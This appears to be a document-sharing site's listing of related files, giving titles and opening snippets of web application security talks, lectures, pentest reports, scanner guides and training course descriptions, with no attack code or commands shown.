More informationCreating Stronger, Safer, Web Facing Code. JPL IT Security Mary Rivera June 17, 2011
Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011 Agenda Evolving Threats Operating System Application User Generated Content JPL s Application Security Program Securing
More informationWeb Application Security. Srikumar Venugopal S2, Week 8, 2013
Web Application Security Srikumar Venugopal S2, Week 8, 2013 Before we start Acknowledgements This presentation contains material prepared by Halvard Skogsrud, Senior Software Engineer, Thoughtworks, Inc.
More informationThe purpose of this report is to educate our prospective clients about capabilities of Hackers Locked.
This sample report is published with prior consent of our client in view of the fact that the current release of this web application is three major releases ahead in its life cycle. Issues pointed out
More informationDetecting Web Application Vulnerabilities Using Open Source Means. OWASP 3rd Free / Libre / Open Source Software (FLOSS) Conference 27/5/2008
Detecting Web Application Vulnerabilities Using Open Source Means OWASP 3rd Free / Libre / Open Source Software (FLOSS) Conference 27/5/2008 Kostas Papapanagiotou Committee Member OWASP Greek Chapter conpap@owasp.gr
More informationWebCruiser Web Vulnerability Scanner User Guide
WebCruiser Web Vulnerability Scanner User Guide Content 1. Software Introduction...2 2. Key Features...3 2.1. POST Data Resend...3 2.2. Vulnerability Scanner...6 2.3. SQL Injection...8 2.3.1. POST SQL
More information1. Building Testing Environment
The Practice of Web Application Penetration Testing 1. Building Testing Environment Intrusion of websites is illegal in many countries, so you cannot take other s web sites as your testing target. First,
More informationData Breaches and Web Servers: The Giant Sucking Sound
Data Breaches and Web Servers: The Giant Sucking Sound Guy Helmer CTO, Palisade Systems, Inc. Lecturer, Iowa State University @ghelmer Session ID: DAS-204 Session Classification: Intermediate The Giant
More informationBypassing Web Application Firewalls (WAFs) Ing. Pavol Lupták, CISSP, CEH Lead Security Consultant
Bypassing Web Application Firewalls (WAFs) Ing. Pavol Lupták, CISSP, CEH Lead Security Consultant Nethemba All About Security Highly experienced certified IT security experts (CISSP, C EH, SCSecA) Core
More informationFINAL DoIT 04.01.2013- v.8 APPLICATION SECURITY PROCEDURE
Purpose: This procedure identifies what is required to ensure the development of a secure application. Procedure: The five basic areas covered by this document include: Standards for Privacy and Security
More informationSecure Programming Lecture 12: Web Application Security III
Secure Programming Lecture 12: Web Application Security III David Aspinall 6th March 2014 Outline Overview Recent failures More on authorization Redirects Sensitive data Cross-site Request Forgery (CSRF)
More informationSpigit, Inc. Web Application Vulnerability Assessment/Penetration Test. Prepared By: Accuvant LABS
Web Application Vulnerability Assessment/enetration Test repared By: Accuvant LABS November 20, 2012 Web Application Vulnerability Assessment/enetration Test Introduction Defending the enterprise against
More informationTop Ten Web Application Vulnerabilities in J2EE. Vincent Partington and Eelco Klaver Xebia
Top Ten Web Application Vulnerabilities in J2EE Vincent Partington and Eelco Klaver Xebia Introduction Open Web Application Security Project is an open project aimed at identifying and preventing causes
More informationWHITE PAPER FORTIWEB WEB APPLICATION FIREWALL. Ensuring Compliance for PCI DSS 6.5 and 6.6
WHITE PAPER FORTIWEB WEB APPLICATION FIREWALL Ensuring Compliance for PCI DSS 6.5 and 6.6 CONTENTS 04 04 06 08 11 12 13 Overview Payment Card Industry Data Security Standard PCI Compliance for Web Applications
More informationCross Site Scripting in Joomla Acajoom Component
Whitepaper Cross Site Scripting in Joomla Acajoom Component Vandan Joshi December 2011 TABLE OF CONTENTS Abstract... 3 Introduction... 3 A Likely Scenario... 5 The Exploit... 9 The Impact... 12 Recommended
More informationASL IT SECURITY BEGINNERS WEB HACKING AND EXPLOITATION
ASL IT SECURITY BEGINNERS WEB HACKING AND EXPLOITATION V 2.0 A S L I T S e c u r i t y P v t L t d. Page 1 Overview: Learn the various attacks like sql injections, cross site scripting, command execution
More informationEnterprise Application Security Workshop Series
Enterprise Application Security Workshop Series Phone 877-697-2434 fax 877-697-2434 www.thesagegrp.com Defending JAVA Applications (3 Days) In The Sage Group s Defending JAVA Applications workshop, participants
More informationThomas Röthlisberger IT Security Analyst thomas.roethlisberger@csnc.ch
Thomas Röthlisberger IT Security Analyst thomas.roethlisberger@csnc.ch Compass Security AG Werkstrasse 20 Postfach 2038 CH-8645 Jona Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch www.csnc.ch What
More information